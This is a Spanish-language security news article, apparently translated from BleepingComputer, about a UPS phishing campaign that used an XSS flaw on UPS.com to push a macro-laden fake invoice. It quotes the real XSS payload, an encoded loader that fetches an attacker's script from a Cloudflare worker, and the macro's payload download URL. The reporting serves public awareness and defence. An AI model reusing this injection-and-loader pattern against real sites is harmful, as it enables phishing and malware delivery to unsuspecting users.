Tecnología

La campaña de phishing utiliza UPS.com XSS vuln para distribuir malware

UPS

Una inteligente campaña de phishing de UPS utilizó una vulnerabilidad XSS en UPS.com para enviar documentos de Word falsos y maliciosos de ‘Factura’.

La estafa de phishing fue descubierta por primera vez por una investigación de seguridad Daniel Gallagher y fingió ser un correo electrónico de UPS indicando que un paquete tenía una «excepción» y que el cliente debía recogerlo.

Lo que hace que este ataque de phishing se destaque es que el actor de la amenaza usó la vulnerabilidad XSS en UPS.com para modificar la página normal del sitio para que pareciera una página de descarga legítima.

Esta vulnerabilidad permitió al actor de amenazas distribuir un documento malicioso a través de un trabajador remoto de Cloudflare, pero hacer que pareciera que se estaba descargando directamente de UPS.com.

Diseccionando la estafa de phishing de UPS

Este correo electrónico está lleno de numerosos enlaces legítimos que no realizan ningún comportamiento malicioso. Sin embargo, el número de seguimiento es un enlace al sitio de UPS que incluye un exploit para una vulnerabilidad XSS que inyecta JavaScript malicioso en el navegador cuando se abre la página.

Correo electrónico de suplantación de identidad de UPS
Correo electrónico de suplantación de identidad de UPS
Las imágenes no se cargan actualmente porque el sitio del atacante está cerrado

La versión limpia de la URL utilizada para el número de seguimiento se puede ver a continuación, y el original se ofusca aún más.

URL utilizada en la estafa de phishing
URL utilizada en la estafa de phishing

Esta URL tiene dos cadenas interesantes que se utilizan como parte del ataque, siendo el primer elemento de interés la siguiente cadena codificada en base64:

MSBqVTU3IE4zM2QgNzAgbTRLMyA3aDE1IFVSTCA0IGwxNzdsMyBMMG45M3IgNzAgSDFEMyBuM3g3IHFVM3JZIFA0UjRNLCB5MHUgNExSMzREeSBLbjB3IFdoWSA7KQ==

La cadena base64 contiene un comentario del actor de amenazas que explica amablemente que se usa para alargar la URL para ocultar un parámetro de consulta de explotación XSS adjunto al final de la URL.

1 jU57 N33d 70 m4K3 7h15 URL 4 l177l3 L0n93r 70 H1D3 n3x7 qU3rY P4R4M, y0u 4LR34Dy Kn0w WhY ;)

Este comentario es interesante, ya que no es común que los actores de amenazas expliquen por qué se crea una URL de cierta manera para un ataque de phishing.

La segunda cadena de interés es el exploit de JavaScript XSS que se inyecta en UPS.com cuando un usuario accede al sitio web.

img src="https://www.bleepingcomputer.com/news/security/phishing-campaign-uses-upscom-xss-vuln-to-distribute-malware/x" onerror="Function(atob('JC5nZXRTY3JpcHQoJ2h0dHBzOi8vbS5tZWRpYS1hbWF6b24ud29ya2Vycy5kZXYvanMnKQ=='))()

La cadena base64 decodificada en la función atob () contiene la URL de un script de trabajo de Cloudflare que cargará la vulnerabilidad.

$.getScript('https://m.media-amazon.workers.dev/js')

El script de trabajo de Cloudflare, capturado por Gallagher en Urlscan, hará que la página de UPS muestre un mensaje de que se está descargando un archivo

Secuencia de comandos de trabajo de Cloudflare utilizada como parte del exploit UPS XSS
Secuencia de comandos de trabajo de Cloudflare utilizada como parte del exploit UPS XSS

El script de trabajo de Cloudflare inyectado por la vulnerabilidad XSS hará que el sitio web de UPS muestre una página de descarga, como se muestra a continuación.

Explotación que hace que la página de UPS muestre una pantalla de descarga
Explotación que hace que la página de UPS muestre una pantalla de descarga

En última instancia, la página descargará el documento de Word malicioso. [VirusTotal] del proyecto Cloudflare del atacante.

Esta campaña de phishing es tan inteligente porque un usuario que visite la URL verá una URL legítima de ups.com que solicita la descarga de una factura.

Esta táctica probablemente hará que las víctimas abran la factura con menos sospecha, pensando que es un archivo real de UPS.

Desde entonces, la vulnerabilidad XSS de UPS.com se ha solucionado basándose en las pruebas de Bleeping Computer.

Bleeping Computer se ha puesto en contacto con UPS con preguntas sobre el ataque, pero no ha recibido respuesta en este momento.

El misterioso documento falso de ‘Factura’

El documento descargado se llama ‘invoice_1Z7301XR1412220178’ y pretende ser una factura de envío de UPS.

Al abrir el documento, todo el texto será ilegible y el documento le pedirá al usuario que ‘Habilite el contenido’ para verlo correctamente.

Documento de Word de factura maliciosa
Documento de Word de factura maliciosa

Cuando están habilitadas, las macros intentarán descargar un archivo https://divine-bar-3d75.visual-candy.workers.dev/blackhole.png.

Sin embargo, esta URL ya no funciona, por lo que no es posible ver la carga útil.

Macros en facturas falsas de UPS
Macros en facturas falsas de UPS

Esta estafa de phishing ilustra la creatividad y las técnicas en evolución utilizadas por los actores de amenazas para distribuir archivos maliciosos de manera convincente.

Si bien el remitente del correo electrónico mostró claramente un dominio sospechoso, ya que la vulnerabilidad XSS permitió que la URL y la página de descarga aparecieran legítimamente en UPS, muchas personas habrían caído en esta estafa.

Leave a Comment

You may also like

Más